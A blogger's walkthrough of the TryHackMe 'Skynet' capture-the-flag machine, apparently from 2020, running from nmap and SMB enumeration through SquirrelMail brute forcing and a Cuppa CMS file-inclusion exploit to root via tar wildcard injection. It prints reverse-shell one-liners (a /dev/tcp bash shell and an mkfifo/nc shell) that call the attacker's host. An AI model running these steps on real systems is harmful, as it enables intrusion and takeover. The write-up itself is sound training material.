Introduction

This room has it’s own writeup by TryHackMe, which can be found here.
Since I usually blog here while I pop machines, let’s see where this one goes.

Scanning & Enumeration

Nmap Scan

> ------------------------Nmap Results-----------------------------<
--------------------------------------------------------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 03:02 IST                                                                                                                                                                               
Nmap scan report for 10.10.107.116                                                                                                                                                                                                            
Host is up (0.41s latency).                                                                                                                                                                                                                   
Not shown: 994 closed ports                                                                                                                                                                                                                   
PORT    STATE SERVICE     VERSION                                                                                                                                                                                                             
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)                                                                                                                                                        
| ssh-hostkey:                                                                                                                                                                                                                                
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)                                                                                                                                                                                
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)                                                                                                                                                                               
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)                                                                                                                                                                             
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))                                                                                                                                                                                      
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                                                                                                                                                  
|_http-title: Skynet                                                                                                                                                                                                                          
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL TOP PIPELINING
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IMAP4rev1 capabilities more ENABLE post-login LITERAL+ SASL-IR IDLE LOGINDISABLEDA0001 LOGIN-REFERRALS listed have Pre-login OK ID
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:                                        
OS:SCAN(V=7.80%E=4%D=8/9%OT=22%CT=1%CU=35749%PV=Y%DS=4%DC=T%G=Y%TM=5F2F1A0D
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11
OS:NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 4 hops                                   
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel 
Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2020-08-08T16:32:48-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-08T21:32:48
|_  start_date: N/A
TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   158.06 ms 10.4.0.1
2   ... 3
4   412.76 ms 10.10.107.116
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.99 seconds
--------------------------------------------------------------------

From the results above, let us populate our Service Version Enumeration Table.

Service Version Enumeration Table

Enumeration

HTTP Enumeration

Landing Page

We check the source code, nothing there.

Let’s try Gobuster.

gobuster dir -u http://10.10.107.116/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10

gobuster results

We see a couple of 301s, 301 stands for Permanently Moved, let us visit try to visit these URLs. ‘/admin’ looks the juiciest of all.

403 — Stands for Forbidden, and is returned when we do not have permission to view them

We get similar 403’s with the rest, except ‘/squirrelmail’

SquirrelMail Login Page

The first thing I do when I see a login page is trying to login using admin: admin. But this was not the right credential. We can google if there are any default passwords for SquirrelMail.

No default user password

At this point, we have not observed any user yet, and thus trying to use hydra would be too tiresome. Let us look at other services.

SMB Enumeration

We use SMBMap to enumerate the samba shares on the server.

anonymous access

We see that we have READ ONLY access to the anonymous shares.
We also notice the share ‘milesdyson’, but we have no access to them.

Contents of the Anonymous Share

We see a file called ‘attention.txt’, well you have all my attention :P
Let’s get the file and see what’s inside.

Contents of Attention.txt

This suggests 2 things:
1. Passwords are changed by a lot of people who are using Skynet, we saw two more folders other than ‘attention.txt’, so next place to look at would be ‘logs’.
2. There is a person named Miles Dyson, whose username might be miles.

List of Logs

Since this is a machine intended to be vulnerable we see only 3 logs, had this been a real environment, there are a lot of logs!

We notice that the size of log2.txt and log3.txt is 0. Let’s see the contents of log1.txt.

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

It has a list of words, looks like something out of this can be our password since the Machine is based on Terminator, the user must be a fan of the movie.

We noticed the share on samba, let us try if we can brute force it as user ‘miles’.

https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/

I found this website which has different hydra-brute-force techniques.

Source: https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/

Since we need to brute-force on smb, let’s use this.

Did not work

This did not work. So I thought of writing a script.

Bruteforce Script

But we find that none of them is the password to access the samba shares.

Well, we can try to brute force the squirrel mail that we had found above.

SquirrelMail

We capture the request in Burp and try to brute-force using intruder.

Post Request in Burpsuite

Adding Intruder Payload for Password Bruteforce

After attacking, I couldn’t find a different output. Let us try to see if we find any online tools that might help us. I found https://github.com/04x/SquirrelMail-BruteForce

BruteForce Script Usage

We see the usage information, and running it did not work as expected.

I am not sure why the intruder did not work. Maybe because I did not provide the correct username? Maybe… Well, what can be the username now? Maybe ‘milesdyson’, why? Because we saw a share with the same name.

Intruder Payload with another username

After running the attack, in the responses tab, We find a 302, and a different length and a status of 302 instead of normal 200.

Intruder Results

I was able to login using the credentials.

Squirrel Mail Dashboard

Once we log in, we see 3 different emails, out of which Samba Password reset obviously looks a lot more important that others having ‘no subject’.

Sensitive Email containing Password

We find the new password for our samba share.

Revisiting Samba

This time we have the password, use it to log in and I see notes.

"notes" found in Samba Share

The folder contains a lot of files, but the most important looks like - "important.txt"

Contents of important.txt

Another URL is exposed.

Revisiting HTTP

With the newly found URL, we are back at enumerating the HTTP.

Landing Page

We see Miles Dyson’s personal page and viewing the source code doesn’t help. It’s gobuster time!!

gobuster dir -u http://10.10.169.147/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

Gobuster Output

We find ‘/administrator’.

This exposes Cupa CMS.

Cuppa CMS Landing Page

I tried to log in using different credentials. None worked. So I searched on Searchsploit if Cuppa CMS has any known vulnerabilities.

Vulnerability Analysis

The first step is to search if searchsploit has any entries for cuppa cms.

Seachsploit Results

Let us copy this file to our working directory, read it's contents.

We see that it is vulnerable to PHP Code Injection and that the vulnerability exists because of the use of ‘include’ which is known as File Inclusion Vulnerability. A little later we see that this file inclusion can be local as well as remote.

Exploit Code showing exploit url options

Let us try and see if we can use the second one first.

Contents of /etc/passwd

Let us upload a PHP reverse shell remotely which once included will give us a full shell on the target machine.

Exploitation

Let us get the PHP reverse shell from Pentest Monkey, http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Modify the script to include attacker ip and the port that our reverse shell will listen on.

Once that is done.

1. Start the webserver on our local machine and the netcat listener
2. On the target machine, add the URL to reverse shell

Initial Shell with User Privileges

Now that we have our initial shell, let’s privesc :D

Privesc

Let us run ‘linpeas.sh’ on the target machine. ( Transfer the linpeas.sh over HTTP and download using wget)

While it ran, I saw the sudo version was ‘sudo 1.8.16’ which was vulnerable, there was a blog on this.

But it required that I knew the password for www-data, which I obviously did not know.

I thought of changing my user to ‘milesdyson’ using the password that we enumerated.

Login using Miles Dyson

It worked, but the exploit still did not. So I continued to keep looking.

Linepeas Output suggesting an escalation vector

According to the LEGEND, this can be a PE vector with a probability of 99%. We will take a look at that in a minute.

backup.sh is owned by root, and can be executed by anyone. Inside that we see that command ‘tar’ is being used. Since it is the only command inside, I think we need to leverage that somehow. Let’s search on GTFO bins.

It surely gives some results, but not sure how I could use them, I looked at the solution provided by TryHackMe. I found this blog, which talks about exploiting wildcards on Linux.

Quote from the blog

Hmmmm… Interesting. This is something really new and the point where everyone thought of using * as a feature and not a bug is one of the classic bug/feature jokes ever!

knowledge - 1

knowledge - 2

Now that we know this, we are required to do the following:
1. Create these fake files
2. Execute some commands as root which can be written inside shell.sh.

Let’s do this.

We saw that the root folder was ‘/var/www/html/’

This gives us an error. Why? Because I had logged in as milesdyson. Running exit once will bring us back to ‘www-data’ who is the owner of the directory. Now we can go ahead and create the files.

Let us try adding this bash reverse shell inside the shell.sh

bash -i >& /dev/tcp/10.4.9.255/1337 0>&1

Just adding this did not work, but the one below, did!

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.4.9.255 1337 >/tmp/f" > shell.sh

And, we got root!

Shell with root privileges

Summary | TL;DR

1. Scan ports using nmap
2. Enumerate Samba and get password list from the network share
3. Enumerate HTTP, use the password list to brute force. Check email. Get authentication for Samba
4. Find hidden URL from Samba, get the CMS
5. CMS has a public vulnerability, exploit that to get a local shell
6. Privesc using wild card vulnerability using tar.

Parting Thoughts

In this machine, we learned the following:

1. How enumeration is key, that we might need to repeatedly enumerate services with new information that we receive during enumeration
2. A crazy privesc vector.

Thank you for reading, please provide your feedback and share with people who are in need. :)